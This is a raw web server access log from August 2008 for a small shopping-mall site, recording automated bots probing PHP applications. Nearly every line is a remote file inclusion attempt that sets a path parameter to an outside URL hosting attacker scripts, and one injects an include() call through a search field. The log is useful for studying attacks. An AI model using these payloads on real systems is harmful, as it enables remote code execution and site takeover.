62.149.232.117 - - [27/Aug/2008:00:02:26 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:02:27 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:02:40 -0700] "GET /logs/access.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:02:41 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:02:41 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "oldfactorymall.com"
193.110.89.6 - - [27/Aug/2008:00:02:41 -0700] "GET /logs/access_080807.log//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
209.172.55.178 - - [27/Aug/2008:00:03:39 -0700] "GET /netcat/htmledit//join.php?DOCUMENT_ROOT=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
209.172.55.178 - - [27/Aug/2008:00:03:39 -0700] "GET /logs/netcat/htmledit//join.php?DOCUMENT_ROOT=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
217.113.53.6 - - [27/Aug/2008:00:03:53 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.oldfactorymall.com"
217.113.53.6 - - [27/Aug/2008:00:03:53 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.oldfactorymall.com"
216.246.46.244 - - [27/Aug/2008:00:04:18 -0700] "GET /logs/netcat/htmledit//join.php?DOCUMENT_ROOT=http://tomromeo.com/chitoz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.oldfactorymall.com"
216.246.46.244 - - [27/Aug/2008:00:04:18 -0700] "GET /netcat/htmledit//join.php?DOCUMENT_ROOT=http://tomromeo.com/chitoz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.oldfactorymall.com"
65.254.49.34 - - [27/Aug/2008:00:04:22 -0700] "GET /?page_id=13&album=http://vcd.co.uk/uploadfiles/bot.txt?? HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.oldfactorymall.com"
65.254.49.34 - - [27/Aug/2008:00:04:22 -0700] "GET /logs/?page_id=13&album=http://vcd.co.uk/uploadfiles/bot.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:04:33 -0700] "GET /logs/access_080722.log//squirrelcart/cart_content.php?cart_isp_root=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:04:34 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:04:34 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:04:52 -0700] "GET /logs/access_080722.log//squirrelcart/cart_content.php?cart_isp_root=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:04:52 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:04:53 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
217.113.53.6 - - [27/Aug/2008:00:05:23 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "oldfactorymall.com"
217.113.53.6 - - [27/Aug/2008:00:05:23 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "oldfactorymall.com"
204.15.10.22 - - [27/Aug/2008:00:05:44 -0700] "GET /logs/access.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
204.15.10.22 - - [27/Aug/2008:00:05:44 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
204.15.10.22 - - [27/Aug/2008:00:05:44 -0700] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
204.15.10.22 - - [27/Aug/2008:00:05:46 -0700] "GET /logs/access.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
204.15.10.22 - - [27/Aug/2008:00:05:46 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
204.15.10.22 - - [27/Aug/2008:00:05:46 -0700] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
209.172.55.178 - - [27/Aug/2008:00:06:43 -0700] "GET /logs/netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
209.172.55.178 - - [27/Aug/2008:00:06:43 -0700] "GET /netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
128.163.2.43 - - [27/Aug/2008:00:07:50 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
91.200.212.3 - - [27/Aug/2008:00:09:17 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
91.200.212.3 - - [27/Aug/2008:00:09:17 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
91.200.212.3 - - [27/Aug/2008:00:09:18 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
193.25.197.82 - - [27/Aug/2008:00:10:21 -0700] "GET /logs/access_080805.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
193.25.197.82 - - [27/Aug/2008:00:10:22 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
193.25.197.82 - - [27/Aug/2008:00:10:49 -0700] "GET /logs/access_080727.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
128.163.2.43 - - [27/Aug/2008:00:10:53 -0700] "GET /logs/access_080722.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
128.163.2.43 - - [27/Aug/2008:00:10:53 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
128.163.2.43 - - [27/Aug/2008:00:10:53 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:11:33 -0700] "GET /logs/access_080807.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:11:33 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:11:36 -0700] "GET /logs/access_080812.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:11:36 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:11:36 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
200.49.100.20 - - [27/Aug/2008:00:11:37 -0700] "GET /logs/access_080812.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.oldfactorymall.com"
200.49.100.20 - - [27/Aug/2008:00:11:37 -0700] "GET /logs/access_080710.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.oldfactorymall.com"
200.49.100.20 - - [27/Aug/2008:00:11:38 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.oldfactorymall.com"
200.49.100.20 - - [27/Aug/2008:00:11:38 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.oldfactorymall.com"
200.49.100.20 - - [27/Aug/2008:00:11:38 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.oldfactorymall.com"
200.49.100.20 - - [27/Aug/2008:00:11:38 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.oldfactorymall.com"
200.49.100.20 - - [27/Aug/2008:00:11:39 -0700] "GET /logs/access_080812.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.oldfactorymall.com"
205.234.186.117 - - [27/Aug/2008:00:11:39 -0700] "GET /logs/access_080810.log//?path%5Bdocroot%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
204.214.80.199 - - [27/Aug/2008:00:11:41 -0700] "GET /errors.php?error=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
204.214.80.199 - - [27/Aug/2008:00:11:41 -0700] "GET /logs/errors.php?error=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
204.214.80.199 - - [27/Aug/2008:00:11:41 -0700] "GET /logs/access_080720.log/errors.php?error=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:11:43 -0700] "GET /logs/access_080812.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:11:44 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:11:44 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:11:44 -0700] "GET /logs/access_080803.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
200.49.100.20 - - [27/Aug/2008:00:11:44 -0700] "GET /logs/access_080710.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:11:49 -0700] "GET /logs/access_080725.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
216.246.46.244 - - [27/Aug/2008:00:11:50 -0700] "GET /logs/netcat/htmledit//join.php?DOCUMENT_ROOT=http://tomromeo.com/chitoz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.oldfactorymall.com"
216.246.46.244 - - [27/Aug/2008:00:11:50 -0700] "GET /netcat/htmledit//join.php?DOCUMENT_ROOT=http://tomromeo.com/chitoz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:12:04 -0700] "GET /logs/access_080807.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:12:05 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:12:05 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
193.25.197.82 - - [27/Aug/2008:00:12:07 -0700] "GET /logs/access_080804.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
193.25.197.82 - - [27/Aug/2008:00:12:07 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:12:38 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:13:01 -0700] "GET /logs/access_080710.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:13:02 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:13:02 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:13:05 -0700] "GET /logs/access_080803.log/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
193.25.197.82 - - [27/Aug/2008:00:13:10 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:13:13 -0700] "GET /logs/access_080805.log/skins/default.php?dir_inc=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:13:13 -0700] "GET /skins/default.php?dir_inc=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:13:14 -0700] "GET /logs/skins/default.php?dir_inc=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
200.49.100.20 - - [27/Aug/2008:00:13:35 -0700] "GET /logs/access_080805.log/skins/default.php?dir_inc=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.oldfactorymall.com"
200.49.100.20 - - [27/Aug/2008:00:13:36 -0700] "GET /skins/default.php?dir_inc=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.oldfactorymall.com"
200.49.100.20 - - [27/Aug/2008:00:13:36 -0700] "GET /logs/skins/default.php?dir_inc=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.oldfactorymall.com"
65.254.49.34 - - [27/Aug/2008:00:13:47 -0700] "GET //?mosConfig_absolute_path=http://vcd.co.uk/uploadfiles/bot.txt?? HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.oldfactorymall.com"
65.254.49.34 - - [27/Aug/2008:00:13:48 -0700] "GET /logs//?mosConfig_absolute_path=http://vcd.co.uk/uploadfiles/bot.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.oldfactorymall.com"
87.101.4.49 - - [27/Aug/2008:00:14:04 -0700] "GET //errors.php?error=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "oldfactorymall.com"
87.101.4.49 - - [27/Aug/2008:00:14:04 -0700] "GET /logs//errors.php?error=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "oldfactorymall.com"
87.101.4.49 - - [27/Aug/2008:00:14:04 -0700] "GET /logs/access.log//errors.php?error=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "oldfactorymall.com"
87.101.4.49 - - [27/Aug/2008:00:14:11 -0700] "GET /logs/access_080810.log//errors.php?error=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
87.101.4.49 - - [27/Aug/2008:00:14:11 -0700] "GET //errors.php?error=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
87.101.4.49 - - [27/Aug/2008:00:14:11 -0700] "GET /logs//errors.php?error=http://www.amimeats.com/micro_cms_files/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
80.74.146.175 - - [27/Aug/2008:00:14:39 -0700] "GET /logs/netcat/htmledit//errors.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
80.74.146.175 - - [27/Aug/2008:00:14:39 -0700] "GET /netcat/htmledit//errors.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
128.163.2.43 - - [27/Aug/2008:00:14:47 -0700] "GET /logs/access_080717.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
128.163.2.43 - - [27/Aug/2008:00:14:47 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
128.163.2.43 - - [27/Aug/2008:00:14:47 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:15:31 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:15:31 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
216.246.46.244 - - [27/Aug/2008:00:15:42 -0700] "GET /netcat/htmledit//errors.php?DOCUMENT_ROOT=http://tomromeo.com/chitoz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.oldfactorymall.com"
216.246.46.244 - - [27/Aug/2008:00:15:42 -0700] "GET /logs/netcat/htmledit//errors.php?DOCUMENT_ROOT=http://tomromeo.com/chitoz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.oldfactorymall.com"
59.106.19.213 - - [27/Aug/2008:00:15:50 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.25.197.82 - - [27/Aug/2008:00:15:51 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
193.110.89.6 - - [27/Aug/2008:00:16:11 -0700] "GET /logs/access_080724.log%20//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
67.195.37.156 - - [27/Aug/2008:00:16:15 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.oldfactorymall.com"
67.195.37.156 - - [27/Aug/2008:00:16:15 -0700] "GET /logs/access.log HTTP/1.0" 200 71800 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.oldfactorymall.com"
193.25.197.82 - - [27/Aug/2008:00:16:31 -0700] "GET /logs/access_080805.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
193.25.197.82 - - [27/Aug/2008:00:16:32 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
193.25.197.82 - - [27/Aug/2008:00:16:32 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
193.25.197.82 - - [27/Aug/2008:00:16:42 -0700] "GET /logs/access_080727.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
59.106.19.213 - - [27/Aug/2008:00:16:45 -0700] "GET /logs/access.log//bemarket/postscript/postscript.php?p_mode=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
59.106.19.213 - - [27/Aug/2008:00:16:45 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
59.106.19.213 - - [27/Aug/2008:00:16:45 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://dj-kelly.com/guestbook////log/idscan9??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:16:56 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:16:56 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
128.163.2.43 - - [27/Aug/2008:00:16:59 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.38.169.228 - - [27/Aug/2008:00:17:07 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
65.38.169.228 - - [27/Aug/2008:00:17:07 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
